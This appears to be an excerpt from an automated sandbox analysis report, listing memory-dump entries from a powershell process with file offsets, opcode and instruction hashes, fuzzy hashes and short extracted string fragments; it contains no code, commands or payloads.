                                                                                                • Instruction ID: 6dca058de2435ad8bc08fff00e2d9a59fbf115eaede777557b1ecbd57cde7d0e
                                                                                                • Opcode Fuzzy Hash: 5a493612106c817e3be39a4ed22929f02d53b2f56cbcd3e4bfdf1f2df5da6e7b
                                                                                                • Instruction Fuzzy Hash: B9811770E00669CFDB54DF69D850BD9BBB2FF89310F1482AAD909A7254DB306E85CF90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 813bad8b6b717b08b7fce26ffea2097703bfc7a2d45b0038a72c4b18b3706ab4
                                                                                                • Instruction ID: 8e4bc946da8383e04130d621e9c94071a09b30a046960048dac028e430a4d6e5
                                                                                                • Opcode Fuzzy Hash: 813bad8b6b717b08b7fce26ffea2097703bfc7a2d45b0038a72c4b18b3706ab4
                                                                                                • Instruction Fuzzy Hash: 44B1F674E06218CFEB94CFADD844BADBBF2BB89300F10906AD509AB355DB756985CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 01e2cbca99a3cb9f77b2f581ff9263f18417e7e700d9904df4101d7bdc61031d
                                                                                                • Instruction ID: 56ce0b7da60dab8d3a3c4004dd2edc4063c07897482c66fe2dc20a03fc0e822d
                                                                                                • Opcode Fuzzy Hash: 01e2cbca99a3cb9f77b2f581ff9263f18417e7e700d9904df4101d7bdc61031d
                                                                                                • Instruction Fuzzy Hash: 7DB1F774E01218CFDB94CFADD8447ADBBF2BB89314F1080AAD509AB355DB756A85CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540951080.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6720000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: dbq
                                                                                                • API String ID: 0-1887291361
                                                                                                • Opcode ID: b79cafba76f0bd7c5519e39910a87f516e9bff220dbdf5808d90997ebd55da51
                                                                                                • Instruction ID: 6b8e6d82a838f2f7cc1330baa4e9fec4690cd678a98546aeb898e67f1718ae14
                                                                                                • Opcode Fuzzy Hash: b79cafba76f0bd7c5519e39910a87f516e9bff220dbdf5808d90997ebd55da51
                                                                                                • Instruction Fuzzy Hash: 9BA116B0D01219CFEB90DFA8D884BADBBF2FF89304F109069E509A3255DB746985CF64
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540951080.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6720000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: dbq
                                                                                                • API String ID: 0-1887291361
                                                                                                • Opcode ID: 863e7af257c17dd8feceda611fbf11f64e7484fe4d5916b5fd21a789b4a8f592
                                                                                                • Instruction ID: 981726c66f082367c1bbc5f6c54250344c9812f1405138fdc5d6886d79cde44d
                                                                                                • Opcode Fuzzy Hash: 863e7af257c17dd8feceda611fbf11f64e7484fe4d5916b5fd21a789b4a8f592
                                                                                                • Instruction Fuzzy Hash: 418135B0905219CFEB90DFA8D884BADBBF2FF88304F109069D409A7355DB746985CF60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6700000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 39ed3ef742466e86c00c17b31fb0a12e30f5498fd4681b47986a4aad6d93c428
                                                                                                • Instruction ID: b6637fa533dc85de0f152ee87361b17410bdea7e9fd9f20ded8edbfc4ad8d9ca
                                                                                                • Opcode Fuzzy Hash: 39ed3ef742466e86c00c17b31fb0a12e30f5498fd4681b47986a4aad6d93c428
                                                                                                • Instruction Fuzzy Hash: 2012A271E00618CBDB54CFAAC98069EFBF2FF88304F24C569D459AB25AD734A946CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4c02f48d8d549ba89f4772401e5c9ccb9dcb822b7deeb23d5ce2e3b847f6dec1
                                                                                                • Instruction ID: 4705eb9bbcd16bd85ec729e6b3e5b2e2ffa3e5aa386357f7790da6ea10a7702b
                                                                                                • Opcode Fuzzy Hash: 4c02f48d8d549ba89f4772401e5c9ccb9dcb822b7deeb23d5ce2e3b847f6dec1
                                                                                                • Instruction Fuzzy Hash: 7DD14A70A04208CFDB94EF68D885BAEBBF6FB49305F109069E809A7659DF746D85CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73e28d4e21e56499cd7084df1f131210ce19ef3381d9fe264216a15d77cb0556
                                                                                                • Instruction ID: 50674dce444c0226a3cebe43412873c926babf74c5437f49401105ea7760e0f1
                                                                                                • Opcode Fuzzy Hash: 73e28d4e21e56499cd7084df1f131210ce19ef3381d9fe264216a15d77cb0556
                                                                                                • Instruction Fuzzy Hash: B1D14A70A04208CFDB94EF68D885BAEBBF2FB49305F109069E509A7659DF346985CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 728c1f1d25da54e91f4ba3f2a1198abee13b88ec04e994d242f01edb19fd262d
                                                                                                • Instruction ID: 7ee086929b8c389537be57c200714ef335e14a81dbf6894c8e246685ab2378f4
                                                                                                • Opcode Fuzzy Hash: 728c1f1d25da54e91f4ba3f2a1198abee13b88ec04e994d242f01edb19fd262d
                                                                                                • Instruction Fuzzy Hash: 96C10570E15218CFEB94CF69D885BADBBF2FB8A314F1480AAD508AB251DB7459C4CF41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 970271ce19cf84281e40706dccb4ddeb6f53faaa7e117cddaece5784e54658b3
                                                                                                • Instruction ID: a45757c8d8270fbbbad88a9d9f04dec2db6c788a5c7235e8a304b88b1c4a7ab8
                                                                                                • Opcode Fuzzy Hash: 970271ce19cf84281e40706dccb4ddeb6f53faaa7e117cddaece5784e54658b3
                                                                                                • Instruction Fuzzy Hash: CEC12A70A04208CFDB94DFA8D885BAEBBF2FB49305F149069E909A7659DF346D85CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7429996996d36593df67998dca633daa331b5c922459afff62a44d088d1fb674
                                                                                                • Instruction ID: 46950d238fbe6539fe2fe50fb046102e329653c9930b855f40b8f1eaf6b76b43
                                                                                                • Opcode Fuzzy Hash: 7429996996d36593df67998dca633daa331b5c922459afff62a44d088d1fb674
                                                                                                • Instruction Fuzzy Hash: A4C1F470E15218CFEBA4CF69D985BADBBF2BB89304F1090AAD50DAB251DB7459C4CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c1c69338c91d6906f99a5ea6e5324838eb6c9a7f373df42f79f1c42d5c792f0
                                                                                                • Instruction ID: 233c1f2e30eb60c65cc394b0b34ba8f4ec21da11b64271e9e269744096c7b3e1
                                                                                                • Opcode Fuzzy Hash: 9c1c69338c91d6906f99a5ea6e5324838eb6c9a7f373df42f79f1c42d5c792f0
                                                                                                • Instruction Fuzzy Hash: 89B1E574E05218CFEB94CF69D984BADBBF2FB49304F1090AAD409AB251DB749AC4CF41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fd16f3d563d21dc58b23813ebc3e4de3d58ea17b36649726248e71fb33677dce
                                                                                                • Instruction ID: 03141b8d7b88b7f531becf9af24324bf3af5198a10e3ddb78ac4568a1735ba4e
                                                                                                • Opcode Fuzzy Hash: fd16f3d563d21dc58b23813ebc3e4de3d58ea17b36649726248e71fb33677dce
                                                                                                • Instruction Fuzzy Hash: E5B1F574E15218CFEBA4CF69D884BADBBF2FB49304F1090AAD509AB251DB745AC4CF41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 76f13d01cc825d02617d3db648771c50dfcc117f4d2d42e22aba147448106b1f
                                                                                                • Instruction ID: 310ad99f3d45600c7ca447974238fdac465656c0116ed8b7568b682d52358ec0
                                                                                                • Opcode Fuzzy Hash: 76f13d01cc825d02617d3db648771c50dfcc117f4d2d42e22aba147448106b1f
                                                                                                • Instruction Fuzzy Hash: A4B1F774E15218CFEB94CF69D884BADBBF2FB45304F1090AAE509AB251DB746AC4CF41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6700000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0d1fec15cc4e59ff6cb6792d08e1770311c95b06bf5d57739463883ec14193e6
                                                                                                • Instruction ID: d8c9984e131444037e54ccc1ea57dce70a86cc0827c4ee30d40941a623db97d2
                                                                                                • Opcode Fuzzy Hash: 0d1fec15cc4e59ff6cb6792d08e1770311c95b06bf5d57739463883ec14193e6
                                                                                                • Instruction Fuzzy Hash: 098103B0D01209CFEB54CFE9C9447EEBBF1EB49314F10912AD619B7284E7784A55CBA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540951080.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6720000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f8a7de42ef8a6dd80bc2d32ab356f844f3b26c165d06b607d0ba6ff91ad14cc9
                                                                                                • Instruction ID: 4ebbc311ad1fcf1d9775d08b9091624ec29a36019d436318e44d8a77d373258f
                                                                                                • Opcode Fuzzy Hash: f8a7de42ef8a6dd80bc2d32ab356f844f3b26c165d06b607d0ba6ff91ad14cc9
                                                                                                • Instruction Fuzzy Hash: E55186B0D06218CFEB90DFA8D448BEEBBB2FF49314F149029D409A7250DB746985CFA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540951080.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6720000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bfa2e5c9a5c1b6bcb6f893dcb3f0e26164be691ec173a7bb2be778bfea3ed204
                                                                                                • Instruction ID: cc69b4df55fa3780ecf9b2d97fb9a017348eff96daf9e405d77b644327b33fb2
                                                                                                • Opcode Fuzzy Hash: bfa2e5c9a5c1b6bcb6f893dcb3f0e26164be691ec173a7bb2be778bfea3ed204
                                                                                                • Instruction Fuzzy Hash: 3B4165B0D06218CFEB90DFA8D448BEEBBB2FF49314F149029D409A7250DB746985CFA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6700000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fc052e8ef78590b7584063950afb3350ca91e894966e590eefd23bc3dea4fbe7
                                                                                                • Instruction ID: 507089fa2e13c3ae7378f5cf6e9023e4b04b11ec4cffa912bfdcb5bd1f0425bd
                                                                                                • Opcode Fuzzy Hash: fc052e8ef78590b7584063950afb3350ca91e894966e590eefd23bc3dea4fbe7
                                                                                                • Instruction Fuzzy Hash: 524157B1E016199BEB08CFABC94059EFBF3BFC8300F14C16AD958AB254EB3459468B54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e45823d009242acac26406236fcc4d5a411b4e141685f4a4dd18fb6659f2a5c8
                                                                                                • Instruction ID: 8f40aab4da9de635ddd0786d2c9d7319bf0af3a6be5163c3dee12f4849d07869
                                                                                                • Opcode Fuzzy Hash: e45823d009242acac26406236fcc4d5a411b4e141685f4a4dd18fb6659f2a5c8
                                                                                                • Instruction Fuzzy Hash: 88414F71E05A588BEB5CCF6B8C4069EFAF7AFC9301F54C1BA851CAA265EB3005428F41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6700000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5afa7ffc4e1d346cdecd7492045b557131749d98595b72b6e33a257aed98c5a6
                                                                                                • Instruction ID: 23053f086f88e63a97a70c5d6e80982ebc5c12cf0761d9c59e7e276267013cb6
                                                                                                • Opcode Fuzzy Hash: 5afa7ffc4e1d346cdecd7492045b557131749d98595b72b6e33a257aed98c5a6
                                                                                                • Instruction Fuzzy Hash: D531F871D157598BEB1ADF2B985069ABBFBAFC5200F04C1FAD408AA256DA300A85CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab3875a1ef62e82f26a22b5c3984206a23f48dac381c0b1222d976beeacc8fb7
                                                                                                • Instruction ID: e198bcc90e949d6a7d60d5c02e87a75bb3b2ffb38b10843f53ebc8d8de297f0a
                                                                                                • Opcode Fuzzy Hash: ab3875a1ef62e82f26a22b5c3984206a23f48dac381c0b1222d976beeacc8fb7
                                                                                                • Instruction Fuzzy Hash: 53313271E01A589BEB5CCF6B9C4429EFAF7AFC9301F54C1BA950CAE258EB3005428F41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6700000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9e4ce638d6b75b61de845388fc1a4b99ede973691c4e9ab08bf4f57592c398fe
                                                                                                • Instruction ID: eaa951bcf812dcaaac5f3ae2504d8e3f39aff4b775c12c4b017c39dfe9d6597b
                                                                                                • Opcode Fuzzy Hash: 9e4ce638d6b75b61de845388fc1a4b99ede973691c4e9ab08bf4f57592c398fe
                                                                                                • Instruction Fuzzy Hash: 5F31BCB1D15619CBEB5DCF6BDC4069AFAFBAFC8300F04D1BA940CAA255DB700A818F51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6700000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d0a65262b689ebe31918468b449b2b9bef9670c7779ee2c8bfee53bed21dcb8f
                                                                                                • Instruction ID: f770f4bdff13464e61b70052afd37c4bc0aaf244e26f9f9e6c26463ee6e16ddb
                                                                                                • Opcode Fuzzy Hash: d0a65262b689ebe31918468b449b2b9bef9670c7779ee2c8bfee53bed21dcb8f
                                                                                                • Instruction Fuzzy Hash: 5521D8B1D01628CBEB58CF6BC9506DDFAF7AFCD300F14C0AAD449AA254DB740A95CE90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S
                                                                                                • API String ID: 0-3544688868
                                                                                                • Opcode ID: c5c3edaaa4704bc75c471fd77f2e169c39de46da20e9fb450fa6cce8604b7d8c
                                                                                                • Instruction ID: 949262d1dd1083c88f368dbefc1314d71eb70eb876322bafbd34f15b105a25f3
                                                                                                • Opcode Fuzzy Hash: c5c3edaaa4704bc75c471fd77f2e169c39de46da20e9fb450fa6cce8604b7d8c
                                                                                                • Instruction Fuzzy Hash: B081E534A093858FD7668B248C64B16BFB2AF82315F1DC5DBD0858F1E7DB768882C752
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ztq$4'^q$4'^q$4'^q$4'^q$LYS$LYS$XRcq$XRcq$XRcq$tP^q$tP^q
                                                                                                • API String ID: 0-2112647005
                                                                                                • Opcode ID: 32e687d99bcfebd9c31ec87e9e89ad4f44a0f3490a7a15270013563e09a6a320
                                                                                                • Instruction ID: c5ab2ccdf578d576dc7e7f73125fbd697b705e47378665dfe08e8aa0903d34fa
                                                                                                • Opcode Fuzzy Hash: 32e687d99bcfebd9c31ec87e9e89ad4f44a0f3490a7a15270013563e09a6a320
                                                                                                • Instruction Fuzzy Hash: CBF1F432F00248DFDF64CF68C8157AABFE2AF88711F14846AF9259B290DB31D955C7A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S
                                                                                                • API String ID: 0-4240606404
                                                                                                • Opcode ID: dcc6ddc8bf0caa470c95a229567d60ff67e783d4f727a29aba07f431c7cc71a1
                                                                                                • Instruction ID: 84efa1361ff88047666efa7c7505b40255c44fc03a29984038da1be0fa5d96fc
                                                                                                • Opcode Fuzzy Hash: dcc6ddc8bf0caa470c95a229567d60ff67e783d4f727a29aba07f431c7cc71a1
                                                                                                • Instruction Fuzzy Hash: 1581A334A0A3858FD7668B2888647137FB2AF82214F1DC5D7D495CF1A3DA7ACC86C752
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$TQcq$TQcq$TQcq$tP^q$tP^q
                                                                                                • API String ID: 0-3054499449
                                                                                                • Opcode ID: 186c0a02190030224692e59cb2d67008b5b7d87e4c57a3df4827161e718eed17
                                                                                                • Instruction ID: d85afe412d5868aac364d060df2b211bd248881601e867a99be3f00e42fd11ae
                                                                                                • Opcode Fuzzy Hash: 186c0a02190030224692e59cb2d67008b5b7d87e4c57a3df4827161e718eed17
                                                                                                • Instruction Fuzzy Hash: C161C335F04218DFDB698F58C6557AABFA2BF88311F2488AAD9015F294CB31DC45CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$P`S$P`S$$^q$$^q$$^q
                                                                                                • API String ID: 0-332042998
                                                                                                • Opcode ID: 1b6a6db859a01849f5dfa9b908673301be3953849c7f6090a4882c67509a757e
                                                                                                • Instruction ID: 7a6bbb50b714f674eeb38b91d50055f8fdd19585b2b07f89f133d8c63a5b2db3
                                                                                                • Opcode Fuzzy Hash: 1b6a6db859a01849f5dfa9b908673301be3953849c7f6090a4882c67509a757e
                                                                                                • Instruction Fuzzy Hash: D5C14432F042148FEB548B68D8047ABBFE2AFD5321B18847BD549CB651EB36D846C7E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$Lxr$Lxr$sr$sr
                                                                                                • API String ID: 0-2655784753
                                                                                                • Opcode ID: 514f57b660c5751bf2494066ab12adcd89ffaf6ff9885f91354585ae774b8261
                                                                                                • Instruction ID: 18b36bbc386e6f376228f1fd4de7a53de8fe68e8338bb3b9f184e582f9d1abc4
                                                                                                • Opcode Fuzzy Hash: 514f57b660c5751bf2494066ab12adcd89ffaf6ff9885f91354585ae774b8261
                                                                                                • Instruction Fuzzy Hash: B9C12870D0421CCFDF58DFA9D9456AEBBB2FF8A301F109029D526AB250CB385982CF90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                                                                • API String ID: 0-1041444323
                                                                                                • Opcode ID: 2d372115de6ee5fe66db88f7d10c86fbb71903a40249d81f395850d1b1c407bc
                                                                                                • Instruction ID: 327be67996ef572e4e9aceaeff0e665410e4eb4b1caccc2ad593eb64f675176e
                                                                                                • Opcode Fuzzy Hash: 2d372115de6ee5fe66db88f7d10c86fbb71903a40249d81f395850d1b1c407bc
                                                                                                • Instruction Fuzzy Hash: E5216D21F093554FCB6A153C18216656FE35FD665133944ABC481DF28ACFA18C5A83E2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3272787073
                                                                                                • Opcode ID: 1bc7c6bd154b363f9741fc5707af763359e9ab8e3e63a940de7ad4ff1c62422f
                                                                                                • Instruction ID: 08d1f1ab4a62939d495eaaf446e8e8da16cb3f68b14db77276ec4d93fe7c0ede
                                                                                                • Opcode Fuzzy Hash: 1bc7c6bd154b363f9741fc5707af763359e9ab8e3e63a940de7ad4ff1c62422f
                                                                                                • Instruction Fuzzy Hash: EDA14636F043558FDB648B68881066ABFE2EFD5221B14C47BD905CB241EF72D866C7A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (br$(br$(br$(br$(br
                                                                                                • API String ID: 0-256022935
                                                                                                • Opcode ID: 699ce88e97bcd6d8dc627d563fd8e76cbd897a21b89bcea9fb8c0735804bccd9
                                                                                                • Instruction ID: e57ab9d86e7435e6efcafa39880c0321c41cd83a9bb40b963a07e7a534b125b3
                                                                                                • Opcode Fuzzy Hash: 699ce88e97bcd6d8dc627d563fd8e76cbd897a21b89bcea9fb8c0735804bccd9
                                                                                                • Instruction Fuzzy Hash: C751BE30B40215DFD751CBADD894A6ABBF2FB85320F14C52BE9099B351CB78E842CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2825857601
                                                                                                • Opcode ID: 3a8a01005d9197abdc51ce76f9536784c318874635e525b7c59623f4ea889eb6
                                                                                                • Instruction ID: 17e4d04a71a0107910393e089500c43e647a6c06e6cce375bf376e226a1fc42a
                                                                                                • Opcode Fuzzy Hash: 3a8a01005d9197abdc51ce76f9536784c318874635e525b7c59623f4ea889eb6
                                                                                                • Instruction Fuzzy Hash: F851BE35E04209DFDFB58F14C5487AA7FB2BF41219F5880A6E8059F1A0D736CD85CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
